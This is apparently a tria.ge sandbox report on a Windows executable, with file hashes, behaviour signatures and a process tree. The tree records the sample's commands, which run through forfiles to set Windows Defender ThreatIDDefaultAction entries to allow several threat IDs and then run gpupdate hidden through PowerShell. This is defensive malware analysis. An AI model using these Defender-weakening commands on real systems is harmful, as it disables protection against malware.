Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    68s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21/09/2024, 15:21

General

  • Target

    fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe

  • Size

    6.7MB

  • MD5

    608fe9a6d6ef81a885f55a989f45b710

  • SHA1

    e9e60dd64b66f324ce953554179f3d3c5544f0ca

  • SHA256

    fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77

  • SHA512

    670067a4211326eaa995d3f3817ec4dbf0075b042882d46de1aa9ec98794fa1acf722c2cf81111df1fb41afca292c70a6324be389f17f304bfe85a94a3177393

  • SSDEEP

    196608:HC7vgxkdo2BI5dUCz8PtxCvFSRPwdUCFqP6tc:H+vbdo+I4KsSCYtkiC

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Indirect Command Execution 1 TTPs 5 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe
    "C:\Users\Admin\AppData\Local\Temp\fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2844
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2168
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        3⤵
        • Indirect Command Execution
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2808
        • C:\Windows\SysWOW64\cmd.exe
          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2796
          • \??\c:\windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2788
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        3⤵
        • Indirect Command Execution
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2812
        • C:\Windows\SysWOW64\cmd.exe
          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2996
          • \??\c:\windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2708
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        3⤵
        • Indirect Command Execution
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2684
        • C:\Windows\SysWOW64\cmd.exe
          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2984
          • \??\c:\windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2780
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        3⤵
        • Indirect Command Execution
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2688
        • C:\Windows\SysWOW64\cmd.exe
          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2560
          • \??\c:\windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
            5⤵
            • System Location Discovery: System Language Discovery
            PID:852
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        3⤵
        • Indirect Command Execution
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2672
        • C:\Windows\SysWOW64\cmd.exe
          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2776
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell start-process -WindowStyle Hidden gpupdate.exe /force
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2588
            • C:\Windows\SysWOW64\gpupdate.exe
              "C:\Windows\system32\gpupdate.exe" /force
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1396
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 240
      2⤵
      • Program crash
      PID:2944

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2844-0-0x0000000001060000-0x0000000001718000-memory.dmp

    Filesize

    6.7MB

  • memory/2844-3-0x0000000010000000-0x00000000110F3000-memory.dmp

    Filesize

    16.9MB

  • memory/2844-7-0x0000000001060000-0x0000000001718000-memory.dmp

    Filesize

    6.7MB